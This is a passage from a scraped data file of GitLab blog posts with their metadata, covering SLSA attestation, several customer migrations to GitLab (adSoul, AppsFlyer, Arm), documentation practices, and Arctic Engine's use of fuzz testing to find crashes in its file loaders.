Because the process happens within the GitLab Runner, without needing third-party software, it prevents the opportunity for any tampering or corruption of the attestation itself.\n\nTo generate an attestation, all that is required is to simply set `RUNNER_GENERATE_ARTIFACTS_METADATA: true` in your `.gitlab-ci.yml` file. You can set the variable globally or on a per-job basis. A CI pipeline then will produce a data.txt file and generate metadata to describe how that file was produced and verify the origin of it or the provenance of it. Users can download this artifact file, which comes as a zip file with the two files inside of it – one is the data.txt and the other is an artifacts metadata .json file.\n\nThe file offers metadata about what was done and it lists out all of the different parameters and input points, including the SHA hash of the file itself as well as the hash of the repository.\n\n“This level of detail enables someone to come in later and get an idea of the steps that were taken in order to produce it as well as information about where it was built so someone can protect their artifacts and reduce the chance of tampering,” White says.\n\n\nFollow the step-by-step instructions here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/MlIdqrDgI8U\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nThe idea of all this, White explains, is to provide a recipe for how the file was built so that if a DevOps team needed to replicate it, they could use those instructions on another machine and get the same build.\n\n## GitLab’s next SLSA step\n\nAs SLSA matures, GitLab plans to [introduce additional features](/direction/supply-chain/), such as the ability to sign the attestation, to guide DevOps teams through SLSA Levels 3 and 4. 
For instance, users currently can use an external code signer to verify the signing and verify the attestation but the ideal state would be to integrate code signing functionality directly into the platform. GitLab also plans to add capabilities that enable more detailed inspection and validation of attestations from upstream dependencies.\n\n**Disclaimer This blog contains information related to upcoming products, features, and functionality. It is important to note that the information in this blog post is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this blog and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab.**\n\n","security",[867,865,9,184],"DevSecOps",{"slug":869,"featured":6,"template":689},"achieve-slsa-level-2-compliance-with-gitlab","content:en-us:blog:achieve-slsa-level-2-compliance-with-gitlab.yml","Achieve Slsa Level 2 Compliance With Gitlab","en-us/blog/achieve-slsa-level-2-compliance-with-gitlab.yml","en-us/blog/achieve-slsa-level-2-compliance-with-gitlab",{"_path":875,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":876,"content":882,"config":889,"_id":891,"_type":14,"title":892,"_source":16,"_file":893,"_stem":894,"_extension":19},"/en-us/blog/adsoul-devops-transition-to-gitlab-ci",{"title":877,"description":878,"ogTitle":877,"ogDescription":878,"noIndex":6,"ogImage":879,"ogUrl":880,"ogSiteName":673,"ogType":674,"canonicalUrls":880,"schema":881},"How adSoul transitioned to GitLab CI from Jenkins","adSoul, a marketing automation company, outlines a successful three-phase migration plan for moving to GitLab CI from Jenkins.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678442/Blog/Hero%20Images/londoncommit.png","https://about.gitlab.com/blog/adsoul-devops-transition-to-gitlab-ci","\n                     
   {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How adSoul transitioned to GitLab CI from Jenkins\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brein Matturro\"}],\n        \"datePublished\": \"2019-11-05\",\n      }",{"title":877,"description":878,"authors":883,"heroImage":879,"date":885,"body":886,"category":801,"tags":887},[884],"Brein Matturro","2019-11-05","\nadSoul is a Germany-based data-driven online marketing company that aims to improve search engine advertising and scalability for businesses. The core of adSoul relies heavily on API interfaces and entity recognition to post keywords on Google and Bing with marketing automation. \n\nAt GitLab Commit London, [Philipp Westphalen](https://www.linkedin.com/in/philipp-westphalen-a83318188/), fullstack developer at adSoul and GitLab Hero, shares how the company transitioned from Jenkins to GiLab CI. adSoul is a startup company with five developers, and as Philipp says “We literally have no time for everything we need to do.” They were looking for a tool that requires less time-consuming maintanence, and with Jenkins the team found it hard to read their existing files. “Our Jenkins was not so stable at all and it was tough to change because it was managed by our provider,” Philipp says. Cost and visibility were also huge motivators in moving away from [Jenkins to Gitlab CI](/blog/docker-my-precious/).\n\n## GitLab migration in three phases\n\nPhase 1: Move the repository.\nThe [adSoul team](https://www.adsoul.com) used the GitHub Import by GitLab, but had setbacks with migrating their issues, so they created a GitHub open source issue migrator as a resolution. Following that, they modified scripts with the new origin by exchanging the GitHub API call with a GitLab API. 
“This was really easy and we had a stable build with our new repository, so we could move our product management to GitLab and not need GitHub anymore,” Philipp says.\n\nPhase 2: Migrate the CI/CD pipeline.\nThe team started to create a GitLab CI YAML and tried to do a simple ‘lift and shift,’ however their processes were more complicated than anticipated. Though this phase was time consuming, it became clear the team could move to phase three without hiccups. “Quick pro tip,” says Philipp. “If you’re running your own GitLab runners, increase the log limit if you have to debug your building step.” \n\nPhase 3: Improve the CI/CD pipeline.\nThe team thought about ways of building their software, so they split projects into steps. “Our idea was that one job does one thing perfectly. Each job is simple and everyone can modify it easily” Philipp says. They improved their build time by moving to Gradle, created parallel job processing, and by using standard Docker images for ease of management. \n\n## Takeaways from a successful migration\n\n1. Plan your migration. Get every member of the team involved and aware of the upcoming changes, including how tools are working together and what the expectations are moving forward. “Take your time for the migration,” Philipp says. “It’s not two days and then we are finished.” \n\n2. Go step by step. adSoul used a three phase plan which allowed the team to deploy a new version and still continue to work on existing projects. “We could improve our application without having to wait for a better infrastructure,” Philipp says.\n\n3. Rethink your [DevOps strategy](/blog/better-devops-with-gitlab-ci-cd/). In the time leading up to the migration, examine things like security automation and other important pieces in a DevOps overall strategy.\n\n4. Start with a small project. 
Work closely with colleagues to create small GitLab CI projects to familiarize everyone before creating larger, overwhelming projects.\n\nPro tip: Keep your pipeline user friendly. Create a good user experience for the team with clear job names, style your config for a better overview, and write comments for variables and hard to understand code. \n\n## Why GitLab works for a small team\n\n“The most important thing is that GitLab is a powerful CI/CD solution with high customization,” Philipp says. There is one home for all projects, without dependencies on one another. With Jenkins, even small exploratory changes can impact the larger job. “With GitLab, you don’t have dependency between branches. So, if you’re trying something new for your CI, you can do it simply in your branch and the master branch will not be affected by the changes,” Philipp says.\n\nThe CI is low maintenance, which is a useful timesaver for a smaller team. “The CI provides us with really low maintenance time. So, usually we don’t have to care about our CI for a month or more,” Philipp says.\n\nTo learn more about adSoul’s migration to GitLab, watch Philipp’s talk from GitLab Commit London.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/C5xfw0ydh2k\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[109,685,9,753,888,845],"startups",{"slug":890,"featured":6,"template":689},"adsoul-devops-transition-to-gitlab-ci","content:en-us:blog:adsoul-devops-transition-to-gitlab-ci.yml","Adsoul Devops Transition To Gitlab 
Ci","en-us/blog/adsoul-devops-transition-to-gitlab-ci.yml","en-us/blog/adsoul-devops-transition-to-gitlab-ci",{"_path":896,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":897,"content":903,"config":911,"_id":913,"_type":14,"title":914,"_source":16,"_file":915,"_stem":916,"_extension":19},"/en-us/blog/an-agile-approach-to-documentation-and-structure",{"title":898,"description":899,"ogTitle":898,"ogDescription":899,"noIndex":6,"ogImage":900,"ogUrl":901,"ogSiteName":673,"ogType":674,"canonicalUrls":901,"schema":902},"An Agile approach to documentation and structure","Combining flexibility and structure: why we decided to use GitLab.com for all UnscrewMe documentation and code to keep an overview, always find the relevant information quickly, and easily track progress.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670464/Blog/Hero%20Images/gitlab-loves-open-source.jpg","https://about.gitlab.com/blog/an-agile-approach-to-documentation-and-structure","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"An Agile approach to documentation and structure\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Goetz Buerkle\"}],\n        \"datePublished\": \"2017-12-13\",\n      }",{"title":898,"description":899,"authors":904,"heroImage":900,"date":906,"body":907,"category":10,"tags":908},[905],"Goetz Buerkle","2017-12-13","\n\nWith an idea and a name, I was ready to start working more seriously on\n[UnscrewMe](http://unscrewme.co.uk/), a simple wine tasting scheduler app. 
Well, almost ready – to avoid ending up with a\nmess of files and folders and stuff scattered across different devices, and\ncertainly never where I need them, my next objective was to set up a central\nlocation where I could store and organize everything flexibly.\n\n\u003C!-- more -->\n\n## GitLab – selecting simple tools\n\nI wanted to keep the overhead low and the management of the documents simple,\nyet extensible enough to cover everything I would need to get started, including\nsimple lists, longer notes, logo drafts, and also more structured technical\nconcepts and even invoices.\n\nBeing a [Certified Scrum Product Owner](https://www.scrumalliance.org/certifications/practitioners/cspo-certification) and using a [GitLab](/) instance at work, I decided to take advantage of the free private repositories and use GitLab.com for UnscrewMe. This combines the simplicity of “just” storing everything in files and folders, with the advantage of being able to use Markdown for more advanced formatting, including sub headings, nested lists and images. And all information can easily be accessed on any device, either via Git directly or the GitLab.com web interface, which also renders Markdown files nicely.\n\nIn addition, project management features of GitLab like [issues](https://docs.gitlab.com/ee/user/project/issues/), [milestones](https://docs.gitlab.com/ee/user/project/milestones/) and\n[Issue Boards](/stages-devops-lifecycle/issueboard/) would provide a useful, flexible and lightweight framework to\ntrack my progress. 
By defining project phases and grouping all open tasks in\nvarious ways, I could get a quick overview of what I would need to do next,\nbefore I could actually launch my Minimum Viable Product (MVP).\nUsing the full power of GitLab.com, I created a “[Group](https://docs.gitlab.com/ee/user/group/index.html)” and three separate\nrepositories: one for all the general documentation, one for the actual web\napplication, and a third for the pre-launch website.\n\n## Defining a flexible structure\n\nYou could of course call my folder structure flawed, as it is not always entirely\nclear where new content or document should go, but so far it works fine for me.\nI started with a high-level view and specified six broad areas:\n* ideas – for anything largely creative\n* concepts – for more detailed specifications and drafts\n* business – for business plans and similar documents focused on the business in general\n* roadmap – to define the main steps without immediately looking at all the details\n* design – basically, everything that is not text\n* finance – for invoices, contracts, etc.\n\nThese six folders give me enough structure and flexibility to get started,\nwithout having to think too hard about what should go where.\nA couple of years ago, I started prepending most files I create with dates,\nlike “2017–08–31\". I find that adding dates are a useful primary sorting\ncriteria when trying to get a quick overview, so I stuck with this approach for\nmy new project as well, even though it might not be the perfect match for all files.\n\n## Google Keep – enabling quick, low-barrier content generation\n\nWith a system mainly based on text files, I could use any editor. 
As I started\nusing [Google Keep](https://www.google.com/keep/) for personal notes a few\nmonths ago, I knew that it was flexible and reliable enough for my needs.\n\nI do have a subscription for a very stripped-down text editor, but I must admit,\nthat I don’t like the barely existing interface too much, and started using\nGoogle Keep for many tasks instead. The big benefit of Google Keep, above the\nother web services I used to rely on for writing, is the support of writing\nnotes offline. While these days you mostly have 4G, 3G or wifi anyway, even on\nholiday, I did find myself sometimes at events or in places without connectivity.\nAnd then, being able to write something offline, that would automatically be\nsynchronized as soon as I would be online again, proved rather useful.\n\nThe only obvious drawback for me now is, that Google Keep does not support\nMarkdown for structure and formatting. But as Markdown markup is pretty minimal\nand easy to read, this hasn’t been much of a limitation.\n\nThe notes editor is simple and fast – I do not really need anything more\nadvanced or complicated. What I do value though it the possibility to add labels,\njust a different name for tags, and colors to notes. 
That way I can easily\ngroup my project notes together and even find the ones I am looking for quickly\nin my main view.\n\n## Visual Studio Code – lightweight editing with Markdown preview and Git support\n\nTo get my basic notes from Google Keep into GitLab, I used [Visual Studio Code](https://code.visualstudio.com/).\nIt is a simple editor with many useful plugins, making editing and checking\nMarkdown documents very convenient and supporting Git out of the box, which was\npretty much all I needed.\n\nOften, my Google Keep notes require just a little bit of cleanup, before they\nare ready to be committed to the Git repository.\nAs I use GitLab milestones and issues to structure all the work, I could also\ntake advantage of this when adding documents to the Git repository and making\nchanges. So I also reference the relevant issues in my commit messages using\n[GitLab Flavored Markdown](https://docs.gitlab.com/ee/user/markdown.html#gitlab-flavored-markdown-gfm) syntax.\n\nNext on my todo list was to [create a simple pre-launch website](https://medium.com/unscrewme/claiming-the-name-257b59d979b)\nto announce the new service, even before it was built. I did read a few times\nthat building a pre-launch website before starting to work on the application\ncode can help to gauge if there even is enough interest for the product. In my\ncase, I was not too concerned about this aspect, since first and foremost, I\nwanted to use my service, therefore by definition it would be worth the effort.\n\n*(I began writing this overview at [Pantry Marylebone](https://www.pantrymarylebone.com/)\nand finished it there too, a few days later. 
I wrote the final paragraphs there\nafter having had three wines at [108 Brasserie](http://108brasserie.com/) before:\na beautiful and well-balanced 2016 Picpoul de Pinet from Domaine Felines Jourdan\nin Languedoc in France, a surprisingly light and smooth 2016 Montepulciano\nd’Abruzzo from Il Faggio in Italy and a somewhat harsh and slightly disappointing\n2016 Beaujolais Vieilles Vignes par Vincent Fontaine from Domaine de la Rocailler, in France.)*\n\n## About the Guest Author\n\nGoetz Buerkle is currently working to launch UnscrewMe. There are so many wine\ntastings happening in London every day – UnscrewMe wants to help Londoners spend\nless time searching for wine events and more time tasting interesting wines\ninstead. [Keep up with the project](http://unscrewme.co.uk/).\n\n\n*[An Agile approach to documentation and structure](https://medium.com/unscrewme/an-agile-approach-to-documentation-and-structure-5fe4a14a6f2f) was originally published on Medium.*\n",[909,9,910],"agile","user stories",{"slug":912,"featured":6,"template":689},"an-agile-approach-to-documentation-and-structure","content:en-us:blog:an-agile-approach-to-documentation-and-structure.yml","An Agile Approach To Documentation And Structure","en-us/blog/an-agile-approach-to-documentation-and-structure.yml","en-us/blog/an-agile-approach-to-documentation-and-structure",{"_path":918,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":919,"content":925,"config":932,"_id":934,"_type":14,"title":935,"_source":16,"_file":936,"_stem":937,"_extension":19},"/en-us/blog/appsflyer-moves-to-gitlab",{"title":920,"description":921,"ogTitle":920,"ogDescription":921,"noIndex":6,"ogImage":922,"ogUrl":923,"ogSiteName":673,"ogType":674,"canonicalUrls":923,"schema":924},"Why AppsFlyer moved from Bitbucket to GitLab","AppsFlyer migrated from Mercurial to Git so the company could move to GitLab's open source, self-managed 
solution.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681252/Blog/Hero%20Images/gitlab-appsflyer.png","https://about.gitlab.com/blog/appsflyer-moves-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why AppsFlyer moved from Bitbucket to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2020-04-27\",\n      }",{"title":920,"description":921,"authors":926,"heroImage":922,"date":928,"body":929,"category":930,"tags":931},[927],"Sara Kassabian","2020-04-27","\n\nResearch shows that [more users are choosing GitLab](/why-gitlab/) as their preferred [version control system](/topics/version-control/). In an [analysis by The New Stack of the results of a 2018 and 2019 Jetbrains developer survey](https://thenewstack.io/i-dont-git-it-tracking-the-source-collaboration-market/), there was an increase in the number of users in the study sample that selected GitLab as their version control system of choice between 2018-2019. In that same period, GitHub had a small decrease in users and Bitbucket had a more substantial decline in the number of users. \n\nOne of the most significant barriers to making the move from a version control system such as Bitbucket or GitHub to GitLab is the data migration process. We have an entire data import team at GitLab that is dedicated to making this process as seamless as possible, but let’s face it, migrating data is always going to be painful. Fortunately, other companies have paved the way to make the migration process a bit more bearable.\n\nAppsFlyer is one of those companies that took the plunge and migrated its entire system from Bitbucket to GitLab, and the team has lived to tell the tale. 
[Elad Leev](https://www.linkedin.com/in/elad-leev/?originalSubdomain=il), platform engineer at AppsFlyer, explains how the engineering organization managed the migration in a presentation at GitLab Commit San Francisco.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/z_6tVRCyJxs\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Why AppsFlyer chose GitLab\n\nBefore showing how AppsFlyer moved to GitLab, it’s valuable to review the business case for _why_ AppsFlyer chose GitLab over other version control systems.\n\nAppsFlyer is a large engineering organization that has more than 300 developers on-staff. Demand for the company's services grew, which translated into more than one million incoming HTTP requests per second or up to 90 billion events per day. AppsFlyer needed to move off the hosted solution it was using with Bitbucket because repositories could be accessed by the public too easily and because latency issues caused some builds to fail. And Bitbucket had restrictions – no more than 1000 calls/hour – and that was an easy target for the growing company to exceed.\n\nAppsFlyer tried moving from the Bitbucket-hosted solution to the closed-source, self-managed option but it was a black box. If there was a bug, it was impossible to know if it was due to their configuration or because something was wrong with the product.\n\nThe company considered GitHub Enterprise, but, like Bitbucket, it is also closed-source and was too expensive for a lower ROI. 
In the end, they chose GitLab because of our growth and [commitment to transparency](https://handbook.gitlab.com/handbook/values/#transparency) – our default to public and the open issue tracker made it the right fit for AppsFlyer.\n\n## Migrating from Mercurial to Git\n\nIn order to convert from Bitbucket to GitLab, AppsFlyer first needed to convert from Mercurial to Git because GitLab runs on Git.\n\nWhen [Bitbucket first launched in 2008, it only supported Mercurial repos](https://Bitbucket.org/blog/sunsetting-mercurial-support-in-Bitbucket). Notably, Bitbucket is actually going to be migrating from Mercurial to Git beginning as of June 1. So whether or not you’re using GitLab, there is no time like the present to transition your repositories to Git, [the version control tool chosen by almost 90% of developers](https://insights.stackoverflow.com/survey/2018#work-_-version-control).\n\nOne of the most complicated parts of the process for AppsFlyer was getting the code from Mercurial to Git, because there isn’t an immediate way to transfer from one version control tool to another.\n\nElad said AppsFlyer needed to save history, commits, tags and, with AppsFlyer being a rapidly growing start-up, to execute the transition as quickly as possible.\n\nThe AppsFlyer devs found a tool called [Fast-Export](https://github.com/frej/fast-export) which basically migrates code from Mercurial to Git and had success on a few different repositories. But could it scale effectively to migrate all the code in the organization?\n\nNext, the team worked with the R&D organization to create a self-service, Fast-Export wrapper to help with the migration from Mercurial to Git at scale. 
The Fast-Export wrapper had a few characteristics that made it work:\n\n*   It was a one-liner, so it was easy-to-use\n*   It was idiot-proof, meaning nobody could make a catastrophic mistake\n*   It used a Slack channel to keep everyone in sync\n*   It was safe, meaning you cannot override somebody’s repository by mistake\n\nThe end-to-end process is fairly straightforward, beginning with checking for the repository in GitLab and logging it into the Slack channel once the repo migration is complete.\n\n![Illustration showing AppsFlyer's Mercurial to Git migration process](https://about.gitlab.com/images/blogimages/mercurial_git.jpg){: .shadow.medium.center}\nThe Mercurial to Git migration process using the fast-export wrapper created by AppsFlyer.\n{: .note.text-center}\n\n“It's really, really important to close the old repository to writes in Bitbucket service because it happened to us more than once: A developer used this tool to migrate his repository from Bitbucket to GitLab, but other developers didn't know that the repository was moved,” says Elad.\n\nThe migration from Mercurial to Git came with a few added benefits, including the opportunity to clean up old repositories; greater transparency across teams into the GitLab migration; and increased developer trust.\n\n## Education helps\n\nDocumentation was also a large part of the migration to Git. AppsFlyer used Guru to carefully document internal processes and identified two courses on Pluralsight to help devs. There is also the entertaining cheat sheet – “[Oh Shit, Git!](https://ohshitgit.com/)” ([here is a profanity-free version](https://dangitgit.com/en)) which Elad created to share some edge cases with Git that he encountered through his work.\n\n## Now, moving to GitLab is pretty easy\n\nOnce your source is in Git, it is pretty simple to upload your data into any version control system using a data importer. 
We have detailed instructions on how to import your data from a different version control system, such as [migrating from Bitbucket to GitLab](https://docs.gitlab.com/ee/user/project/import/bitbucket_server.html), which is what AppsFlyer did.\n\n## Perks of working with an open source, self-managed solution\n\nA self-managed product that is closed-source means the user will always rely on an external vendor when it comes to managing their codebase, and we believe that having end-to-end visibility is essential when it comes to self-hosting. One of the main perks of working with an open source, self-managed version control system such as GitLab is that your team has the flexibility to build upon your existing codebase. Here are a few examples:\n\n*   AppsFlyer created another small, one-liner tool (BB2GL) that connects with Slack to help with data migration. Then, they took it a step further and connected the one-liner repository to Slack.\n*   Set deadlines: AppsFlyer created a scheduled task list that checks all the repos in Bitbucket and all the repos in GitLab to see which projects have been moved from Bitbucket to GitLab and posts a reminder on Slack for the teams.\n*   Created an in-house API wrapper which helped cut-down on code that was duplicative but written in different languages. The API wrapper helped create one location for all the GitLab metadata.\n*   The in-house API Wrapper is updated using GitLab System Hooks. Read Elad’s [in-depth Medium article to learn more about System Hooks](https://medium.com/appsflyer/gitlab-the-magic-of-system-hooks-f38c4f7ca8e7).\n\nIt’s been two years since AppsFlyer made the switch to GitLab, and it’s helped the company’s growth considerably, says Elad. Some team members have abandoned the Atlassian project management tools they used before to switch to GitLab.\n\nBut no product is perfect. There are two bugs that AppsFlyer encountered and raised with GitLab support. 
One of them has been resolved, [one is still pending](https://gitlab.com/gitlab-org/gitlab/-/issues/14130). This level of visibility into bugs wouldn’t be possible without features like the [public issue tracker](https://docs.gitlab.com/ee/user/project/issues/), which promote transparency and collaboration between GitLab users and internal GitLab teams.\n","news",[751,9,267],{"slug":933,"featured":6,"template":689},"appsflyer-moves-to-gitlab","content:en-us:blog:appsflyer-moves-to-gitlab.yml","Appsflyer Moves To Gitlab","en-us/blog/appsflyer-moves-to-gitlab.yml","en-us/blog/appsflyer-moves-to-gitlab",{"_path":939,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":940,"content":946,"config":954,"_id":956,"_type":14,"title":957,"_source":16,"_file":958,"_stem":959,"_extension":19},"/en-us/blog/arctic-engine-fuzz-testing-blog",{"title":941,"description":942,"ogTitle":941,"ogDescription":942,"noIndex":6,"ogImage":943,"ogUrl":944,"ogSiteName":673,"ogType":674,"canonicalUrls":944,"schema":945},"How Arctic Engine uses GitLab's fuzz testing","Using GitLab's fuzz testing, we discovered and fixed various real defects that could crash our software. 
Now we can detect vulnerabilities before merging the code.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681504/Blog/Hero%20Images/arcticengine.png","https://about.gitlab.com/blog/arctic-engine-fuzz-testing-blog","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How Arctic Engine uses GitLab's fuzz testing\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Huldra\"}],\n        \"datePublished\": \"2020-08-19\",\n      }",{"title":941,"description":942,"authors":947,"heroImage":943,"date":949,"body":950,"category":951,"tags":952},[948],"Huldra","2020-08-19","\n\n{::options parse_block_html=\"true\" /}\n\n\n\n## About Arctic Engine\n\n[Arctic Engine](https://gitlab.com/huldra/arctic) is an open-source, free game\nengine released under the [MIT license](https://opensource.org/licenses/MIT).\nArctic Engine is implemented in C++ and focuses on simplicity. Being a C++\nprogrammer and making games should not be joyless, disillusioning, and\ndiscouraging. In the '80s and '90s, a programmer could make games alone, and\nit was fun. Arctic Engine aims at making game development in C++ fun again.\n\n## Testing can be fun\n\nTesting the game engine is very important since games are usually no more\nrobust and performant than the underlying middleware or game engine. Writing\ntests by hand is time-consuming and disillusioning, and it may drain the fun\nfrom the development process. So, to my shame, I avoided writing tests in every\nway I could. For instance, I used static analyzers to detect bugs. The problem\nwith static analyzers was the lack of motivation to fix potential issues. You\nmay be unsure whether a bug is really there, and it can sometimes be hard to\nfind a way to trigger it.\n\nThe other possibility was fuzz testing. I heard about fuzzing but didn't try it\nearlier because I thought it was hard to integrate with the project. I could\nnot be more wrong. 
It's amazing how little effort it takes to get fuzz testing\nup and running with GitLab.\n\n## Fuzz testing and what it exposed\n\nThanks to [Sam Kerr](https://gitlab.com/stkerr) for proving me wrong about\nfuzzing by [actually fuzzing](https://gitlab.com/huldra/arctic/-/commit/946382569d88c3af7f4a7ea075c3c3cb18d3b06b)\nthe sound loader code. Arctic Engine allows loading a sound from a WAV file in\nmemory. To fuzz the loader's code, you create a small CPP file with a single\nfunction like this:\n\n```cpp\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t * data, size_t size) {\n    std::shared_ptr\u003Carctic::SoundInstance> result = arctic::LoadWav(data, size);\n    return 0;\n}\n```\n\nThen you add ``-fsanitize=fuzzer`` flag to the CMakeLists.txt file and a few\nlines to the `.gitlab-ci.yml` file, and the fuzzing begins! You may want to\ndrop in a few WAV files to the corpus folder to help the fuzzer and speed up\nthe process, but that's optional. Ok, it was a little harder than that with the\nArctic Engine because it would output a message and quit upon processing\nunsupported file formats. Still, handling file loading errors this way was a\nbad idea, and I finally had a reason to fix it.\n\nThe fuzzer started crashing Arctic Engine: first, it triggered a signed integer\noverflow, a division by zero, and a buffer overrun. And then, the wave loader\ngot out-of-memory while trying to resample a tiny WAV file with a sampling rate\nof 1 sample per second to 44100 samples per second. Wow.\n\nWhat I liked about fuzzing is that fuzzer actually crashes your program and\nprovides you the input so you can reproduce the crash. And once you've set up\nthe test harness, the entire testing process is fully automated, saving you\ntime and effort. It's like having a personal QA team, you commit your code, and\nin a few minutes, you already have it tests-covered.\n\nThen I fuzzed the CSV and the TGA file parsers and expected to find some bugs\nin the CSV and none in the TGA. 
What can I say? You may not find bugs where you\nexpect them to be and find bugs where you thought there were none. The TGA\nloader crashed immediately with a buffer overrun. It did not account for files\ncontaining only a valid header but no actual image data after it.\n\n## Plans\n\nI will add a simple HTTP web server and some multiplayer network interaction\ncode to the Arctic Engine. I was putting it off for quite a while now because I\nthought testing would be a pain. Now that I know how easy it is to apply\nGitLab's fuzz testing to any data processing code, I'm very optimistic and\nsomewhat challenged. Like \"Can I make it withstand the fuzzer from the first try?\".\nIt makes writing code fun for me once again.\n\n## Further reading\n\n- [GitLab's coverage-guided fuzz testing documentation](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/#coverage-guided-fuzz-testing)\n- [GitLab's Fuzzing 101 playlist](https://www.youtube.com/playlist?list=PL05JrBw4t0KoYzW1CR-g1rMc9Xgmnhjfe)\n\n### About the guest author\n\nHuldra is a senior videogame programmer by day maintainer of the [Arctic Engine](https://gitlab.com/huldra/arctic) by night. 
She started it because she wanted a game engine that kept simple things simple and made complex things possible.\n","unfiltered",[109,9,865,953,910,953],"testing",{"slug":955,"featured":6,"template":689},"arctic-engine-fuzz-testing-blog","content:en-us:blog:arctic-engine-fuzz-testing-blog.yml","Arctic Engine Fuzz Testing Blog","en-us/blog/arctic-engine-fuzz-testing-blog.yml","en-us/blog/arctic-engine-fuzz-testing-blog",{"_path":961,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":962,"content":968,"config":975,"_id":977,"_type":14,"title":978,"_source":16,"_file":979,"_stem":980,"_extension":19},"/en-us/blog/arm-open-source-makes-a-seamless-migration-to-gitlab",{"title":963,"description":964,"ogTitle":963,"ogDescription":964,"noIndex":6,"ogImage":965,"ogUrl":966,"ogSiteName":673,"ogType":674,"canonicalUrls":966,"schema":967},"Arm Open Source makes a seamless migration to GitLab","DevOps platform switch reaps cost savings of up to 20%.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670681/Blog/Hero%20Images/a-creative-agencys-gitlab-wishlist.jpg","https://about.gitlab.com/blog/arm-open-source-makes-a-seamless-migration-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Arm Open Source makes a seamless migration to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2022-10-03\",\n      }",{"title":963,"description":964,"authors":969,"heroImage":965,"date":971,"body":972,"category":10,"tags":973},[970],"GitLab","2022-10-03","[Arm](https://www.arm.com/) wanted to modernize its infrastructure to span across internal (private) and open-source collaborative repositories, and, in the process, consolidate some of its key projects on the same underlying infrastructure. Arm selected GitLab as its new platform. 
\n\nArm builds software that acts as enablement pieces that can be integrated with other software on its architecture. These are foundational pieces of software that often underpin commercial software offerings, from operating systems to middleware applications. Over 99% of mobile devices have Arm-based processors and the software from the Open Source Engineering team powers computers from sensors up to the cloud.\n\n“The magic really happens when you join enablement pieces with other bits of software from other communities and other projects,” explains Andrew Wafaa, distinguished engineer and senior director of software communities at Arm.\n\nThe goal is to give software developers the best of the Arm architecture, he adds. The enablement pieces “leverage a lot of the bells and whistles from the Arm architecture and that allows people to take those and integrate them with other stacks.”\n\n## GitLab open source lets Arm use its own tooling\n\nArm had a mix of stand-alone Git servers internally and public web-based Git service and wanted to consolidate to a single solution for the company’s larger projects. However,  most of the new core infrastructure that Arm is deploying is on native Arm-based hardware, and the Git service is a proprietary solution. \n\nArm would have to work with its previous platform provider to ensure correctness. According to Wafaa, “We'd have to do reviews, and the patch review process is challenging because it's all private and proprietary code, which was a big factor for us in choosing GitLab.” In addition, Arm had concerns about the code ownership of their OSS projects hosted on the external service. Therefore, Arm determined an open source solution like GitLab would be the best option to maximize choice, be cost effective, and minimize vendor lock-in. Moving to GitLab’s self-hosted platform supported effective collaboration and enabled Arm’s software to be hosted on Arm technology.  
\n\nAnother large bonus is that because [GitLab is open source](/solutions/open-source/), Arm can use its own tools to support its open source ecosystem. “Using an open source product made sense at the end of the day,’’ Wafaa says. “Another big factor was that GitLab is an enterprise-grade product that provides very similar workflows to what Arm was already using. It was very easy to move from our previous platform to GitLab; the terminology is very similar, as well as the look and feel.”\n\nFurther, GitLab is a self-hosted enterprise product, and it was important to Arm to have good customer support in the event that something goes wrong.\n\nArm hosts about 200 external open source projects, so of course cost was also a consideration, Wafaa says. “When we're looking at future growth plans there needs to be a reasonable amount of savings and GitLab made it appealing cost-wise.” \n\n## Maintaining control every step along the way\n\nArm is in the process of moving internal workloads to the Arm architecture. Although GitLab didn't initially support Arm, the company “was quite happy to work with us and our engineering teams to ensure that it did support Arm” by creating integrations with its infrastructure, Wafaa says.\n\n“The fact that we could have that fine-grained access control was a huge benefit to us and being able to replicate it on AWS Graviton EC2 instances globally gave us that full redundancy and disaster recovery requirements to meet our IT's needs,\" Wafaa says.\n\nBecause Arm is an IP company, security is paramount. Wafaa says they opted for a gradual migration before scaling out. “For us to deploy, we have to go through a number of approvals with various security teams internally, and that went fairly smoothly. It just worked.”\n\nAfter a “mini deployment,” everything is working seamlessly, he says. Now, anyone can run GitLab on Arm from an enterprise perspective.\n\nThen Wafaa and others held their collective breath awaiting feedback. 
